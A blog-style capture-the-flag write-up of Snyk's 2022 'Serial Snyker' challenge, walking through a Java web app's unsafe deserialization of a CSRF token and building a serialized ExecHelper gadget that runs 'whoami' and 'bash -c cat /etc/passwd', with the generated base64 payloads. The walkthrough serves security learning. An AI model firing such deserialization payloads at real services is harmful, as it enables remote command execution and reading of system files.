---
title: "Serial Snyker - Java Deserialization"
date: 2022-11-21T23:51:53+01:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - Deserialization
---

# Fetch the Flag CTF 2022 - Snyk

Name | Category |  Website
------------|----------|---- 
**Fetch the Flag CTF 2022**| **Web** |  **https://snyk.io/ctf/**

We're given a simple web application written in Java with unsafe object deserialization. This challenge takes a whitebox approac, so let's jump into the souce code.

# [*] INDEX:

- [Application Structure Analisys](#application-structure-analisys)
- [Finding Java Gadget Chain](#finding-java-gadget-chain)
- [Building our exploit](#building-our-exploit)

# Application Structure Analisys

First of all let's take a look at the structure of the application : 

```
main
├── java
│   └── com
│      └── snykctf
│          └── serialsnyker
│              ├── Base64Helper.java
│              ├── CSRFToken.java
│              ├── ExecHelper.java
│              ├── IndexController.java
│              ├── SerialSnyker.java
│              ├── SerializationUtils.java
│              └── testing_deser.java
├── main.iml
├── out
│   └── production
│       └── main
└── resources
    ├── application.properties
    ├── static
    │   ├── bootstrap-5.2.0-beta1-dist
    │   │   └── js
    │   │       ├── bootstrap.bundle.js
    │   │       ├── bootstrap.bundle.js.map
    │   │       ├── bootstrap.bundle.min.js
    │   │       ├── bootstrap.bundle.min.js.map
    │   │       ├── bootstrap.esm.js
    │   │       ├── bootstrap.esm.js.map
    │   │       ├── bootstrap.esm.min.js
    │   │       ├── bootstrap.esm.min.js.map
    │   │       ├── bootstrap.js
    │   │       ├── bootstrap.js.map
    │   │       ├── bootstrap.min.js
    │   │       └── bootstrap.min.js.map
    │   ├── bootstrap-5.2.0-beta1-dist.zip
    │   ├── css
    │   │   ├── bootstrap-grid.min.css
    │   │   ├── bootstrap-grid.rtl.min.css
    │   │   ├── bootstrap-reboot.min.css
    │   │   ├── bootstrap-reboot.rtl.min.css
    │   │   ├── bootstrap-utilities.min.css
    │   │   ├── bootstrap-utilities.rtl.min.css
    │   │   ├── bootstrap.min.css
    │   │   ├── bootstrap.rtl.min.css
    │   │   └── main.css
    │   └── img
    │       ├── cat.png
    │       ├── patch-bg.png
    │       └── patch.png
    └── templates
        ├── error.html
        └── index.html
```

We can find all java files in `serialsnyker`, let's start reviewing `IndexCotroller.java` which is possibly the request handler :

```java
package com.snykctf.serialsnyker;

import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

@Controller
public class IndexController {

    @GetMapping("/")
    public String index(Model model,
                        HttpServletRequest request,
                        HttpServletResponse response) throws IOException {
        model.addAttribute("csrfToken", this.getCSRFToken());
        return "index";
    }

    @PostMapping("/")
    public String authenticate(Model model,
                               @RequestParam String username,
                               @RequestParam String password,
                               @RequestParam String csrfToken) throws Exception {

        CSRFToken token = new CSRFToken();
        Object obj = null;
         try {
            obj = SerializationUtils.deserialize(csrfToken);
            token = (CSRFToken) obj;
        model.addAttribute("exception", "helloworld!!");
        } catch (Exception ex) {
             if (obj == null) {
                 model.addAttribute("error", ex.getMessage());
             } else {
                 model.addAttribute("error", obj.toString() + ex.getMessage());
             }

             return "index";
        } catch (Error ex) {
             model.addAttribute("error",  ex.getMessage());
             return "index";
         }

        model.addAttribute("csrfToken", this.getCSRFToken());
        return "index";
    }

    private String getCSRFToken() {
        CSRFToken token = new CSRFToken();
        return SerializationUtils.serialize(token);
    }

}
```
Let's go by parts, first in the `/` endpoint using `POST` method we can submit `username/password/csrfToken`. This `csrfToken` is the key because if we follow the execution flow we realize that the token is being deserialized :

```java
CSRFToken token = new CSRFToken();
Object obj = null;
    try {
        obj = SerializationUtils.deserialize(csrfToken);
        token = (CSRFToken) obj;
    model.addAttribute("exception", "helloworld!!");
}
```

But what does `SerializationUtils.deserialize(csrfToken)` do? This method is implemented in `SerializationUtils.java` let's take a look to that file :

```java
package com.snykctf.serialsnyker;

import java.io.*;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class SerializationUtils {
    public static String serialize(Object item) {
        final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        final ObjectOutputStream objectOutputStream;
        try {
            objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(item);
            objectOutputStream.close();
            byte[] bytes = Base64.getEncoder().encode(byteArrayOutputStream.toByteArray());
            return new String(bytes, StandardCharsets.US_ASCII);
        } catch (IOException e) {
            throw new Error(e);
        }
    }

    public static Object deserialize(String data) {
        try {
            byte[] objBytes = Base64.getDecoder().decode(data);
            final ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(objBytes);
            final ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
            final Object obj = objectInputStream.readObject();
            objectInputStream.close();
            return obj;
        } catch (IOException e) {
            throw new Error(e);
        } catch (ClassNotFoundException e) {
            throw new Error(e);
        }
    }
}
```

`deserialize()` method takes a base64 encoded parameter and then it's deserialized using `final Object obj = objectInputStream.readObject();`. 


# Finding Java Gadget Chain 

If we keep reviewing the rest of java classes we find `ExecHelper.java` :

```java
package com.snykctf.serialsnyker;

import java.io.*;
import java.util.Arrays;

public class ExecHelper implements Serializable {
    private Base64Helper[] command;
    private String output;

    public ExecHelper(Base64Helper[] command) throws IOException {
        this.command = command;
    }

    public void run() throws IOException {
        String[] command = new String[this.command.length];
        for (int i = 0; i < this.command.length; i++) {
            String str = this.command[i].decode();
            command[i] = str;
        }

        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        String result =  s.hasNext() ? s.next() : "";
        System.out.println("executing...");
        System.out.println(result);
        this.output = result;
        /*Process process = Runtime.getRuntime().exec(command);

        BufferedReader stdInput = new BufferedReader(new
                InputStreamReader(process.getInputStream()));

        BufferedReader stdError = new BufferedReader(new
                InputStreamReader(process.getErrorStream()));

        System.out.println("Command Output:\n");
        String s = null;
        while ((s = stdInput.readLine()) != null) {
            System.out.println(s);
        }*/
    }

    @Override
    public String toString() {
        return "ExecHelper{" +
                "command=" + Arrays.toString(command) +
                ", output='" + output + '\'' +
                '}';
    }

    private final void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        run();
    }

    public static void main(String[] args) {
        
    }
}
```

We find that `readObject()` after executing `defaultReadObject()` executes `run()`. Which is a method that executes system commands :

```java
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).
```

This executes `command` which is an array of `Base64Helper` objects (`Base64Helper[] command`). `Base64Helper` receives a base64 encoded string and then decodes it :

```java
package com.snykctf.serialsnyker;

import java.io.Serializable;
import java.util.Base64;

public class Base64Helper implements Serializable {
    private String base64;

    public Base64Helper(String base64) {
        this.base64 = base64;
    }

    public String decode() {
        return new String(Base64.getDecoder().decode(this.base64));
    }
}
```


# Building our exploit

Let's start creating our exploit, to correctly reference classes we have to create our exploit file inside `java` directory. 

First we have to import all the packages we'll be using (we're also importing all the classes from the source otherwise those clases will not be located):

```java
import java.io.*;
import java.util.Base64;
import com.snykctf.serialsnyker.*;
```

Then define our `Base64Helper[]` array and create a `Base64Helper` inside. After that we just have to initialize the `ExecHelper` object and serialize it :

```java
public class testing_deser {
    public static void main(String[] args) throws IOException {        
        Base64Helper[] command = { 
            new Base64Helper(new String(Base64.getEncoder().encode("whoami".getBytes())))
        }; 
        ExecHelper eh = new ExecHelper(command);
        System.out.println(SerializationUtils.serialize(eh));       
    }
}
```

Now we just have to compile it and run it :

```
$ javac testing_deser.java
$ java testing_deser
rO0ABXNyACNjb20uc255a2N0Zi5zZXJpYWxzbnlrZXIuRXhlY0hlbHBlcrDAsy7xftStAgACWwAHY29tbWFuZHQAKFtMY29tL3NueWtjdGYvc2VyaWFsc255a2VyL0Jhc2U2NEhlbHBlcjtMAAZvdXRwdXR0ABJMamF2YS9sYW5nL1N0cmluZzt4cHVyAChbTGNvbS5zbnlrY3RmLnNlcmlhbHNueWtlci5CYXNlNjRIZWxwZXI7+b8OqsbvaZQCAAB4cAAAAAFzcgAlY29tLnNueWtjdGYuc2VyaWFsc255a2VyLkJhc2U2NEhlbHBlcjkjJLVh8OrxAgABTAAGYmFzZTY0cQB+AAJ4cHQACGQyaHZZVzFwcA==
```

Let's open BurpSuite and check put the payload in the CSRF token field :

![<- Not working](/static/HACKING/serial_snyker-1.png)

Hmm it says that `serialVersionUID` it's not compatible. Serialization runtime associates with each serializable class a `serialVersionUID`, this is used during deserialization to ensure that client and server have loaded classes for that specific object that are compatible with respect to serialization. In the case that `serialVersionUID` doesn't match this will lead to `InvalidClassException`. Although we can just declare it explicitly :

```java
private static final long serialVersionUID = -5172660202116960613L;
```

Let's try now again :

```
$ javac testing_deser.java
$ java testing_deser
rO0ABXNyACNjb20uc255a2N0Zi5zZXJpYWxzbnlrZXIuRXhlY0hlbHBlcrg3BPO9BK6bAgACWwAHY29tbWFuZHQAKFtMY29tL3NueWtjdGYvc2VyaWFsc255a2VyL0Jhc2U2NEhlbHBlcjtMAAZvdXRwdXR0ABJMamF2YS9sYW5nL1N0cmluZzt4cHVyAChbTGNvbS5zbnlrY3RmLnNlcmlhbHNueWtlci5CYXNlNjRIZWxwZXI7+b8OqsbvaZQCAAB4cAAAAAFzcgAlY29tLnNueWtjdGYuc2VyaWFsc255a2VyLkJhc2U2NEhlbHBlcjkjJLVh8OrxAgABTAAGYmFzZTY0cQB+AAJ4cHQACGQyaHZZVzFwcA==
```

![<- Not working](/static/HACKING/serial_snyker-2.png)

Looks like it worked? Let's test again but now trying to read `/etc/passwd` :

```java
Base64Helper[] command = { 
    new Base64Helper(new String(Base64.getEncoder().encode("bash".getBytes()))), 
    new Base64Helper(new String(Base64.getEncoder().encode("-c".getBytes()))), 
    new Base64Helper(new String(Base64.getEncoder().encode("cat /etc/passwd".getBytes()))), 
};
```

Change `Base64Helper`, and try the payload :

```
$ javac testing_deser.java
$ java testing_deser
rO0ABXNyACNjb20uc255a2N0Zi5zZXJpYWxzbnlrZXIuRXhlY0hlbHBlcrg3BPO9BK6bAgACWwAHY29tbWFuZHQAKFtMY29tL3NueWtjdGYvc2VyaWFsc255a2VyL0Jhc2U2NEhlbHBlcjtMAAZvdXRwdXR0ABJMamF2YS9sYW5nL1N0cmluZzt4cHVyAChbTGNvbS5zbnlrY3RmLnNlcmlhbHNueWtlci5CYXNlNjRIZWxwZXI7+b8OqsbvaZQCAAB4cAAAAANzcgAlY29tLnNueWtjdGYuc2VyaWFsc255a2VyLkJhc2U2NEhlbHBlcjkjJLVh8OrxAgABTAAGYmFzZTY0cQB+AAJ4cHQACFltRnphQT09c3EAfgAGdAAETFdNPXNxAH4ABnQAFFkyRjBJQzlsZEdNdmNHRnpjM2RrcA==
```

![<- Not working](/static/HACKING/serial_snyker-3.png)
